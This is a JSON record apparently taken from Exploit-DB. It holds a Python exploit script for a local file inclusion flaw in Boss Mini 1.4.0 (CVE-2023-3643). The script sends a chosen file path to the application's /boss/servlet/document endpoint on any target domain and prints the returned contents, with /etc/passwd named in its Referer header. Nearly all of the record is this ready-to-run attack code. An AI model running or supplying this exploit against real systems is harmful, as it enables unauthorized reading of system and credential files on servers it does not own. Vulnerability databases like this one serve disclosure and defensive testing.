{"source": "https://www.exploit-db.com/exploits/51848", "vulnName": "Boss Mini 1.4.0 - local file inclusion", "vulnEDBID": "51848", "vulnCVE": "N/A", "author": "NLTT0", "exploitType": "WEBAPPS", "platform": "PHP", "datePublished": "2024-03-03", "vulnContent": "# Exploit Title: Boss Mini 1.4.0 - local file inclusion\n# Date: 07/12/2023\n# Exploit Author: [nltt0] (https://github.com/nltt-br))\n# CVE: CVE-2023-3643\n\n\n'''\n _____       _                              _____ \n/  __ \\     | |                            /  ___|\n| /  \\/ __ _| | __ _ _ __   __ _  ___  ___ \\ `--. \n| |    / _` | |/ _` | '_ \\ / _` |/ _ \\/ __| `--. \\\n| \\__/\\ (_| | | (_| | | | | (_| | (_) \\__ \\/\\__/ /\n \\____/\\__,_|_|\\__,_|_| |_|\\__, |\\___/|___/\\____/ \n                            __/ |                 \n                           |___/                  \n\n'''\n\nfrom requests import post \nfrom urllib.parse import quote\nfrom argparse import ArgumentParser\n\ntry:\n    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')\n    parser.add_argument('--domain', required=True, help='Application domain')\n    parser.add_argument('--file', required=True, help='Local file')\n\n    args = parser.parse_args()\n    host = args.domain\n    file = args.file\n    url = '{}/boss/servlet/document'.format(host)\n    file2 = quote(file, safe='')\n\n    headers = {\n        'Host': host,\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',\n        'Content-Type': 'application/x-www-form-urlencoded',\n        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',\n        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)\n    }\n\n\n    data = {\n        'path': file2\n    }\n\n    try:\n        req = post(url, headers=headers, data=data, verify=False)\n        if req.status_code == 200:\n            print(req.text)\n\n    except Exception as e:\n        print('Error in {}'.format(e))   \n       \n\nexcept Exception as e:\n    print('Error in {}'.format(e))\n            "}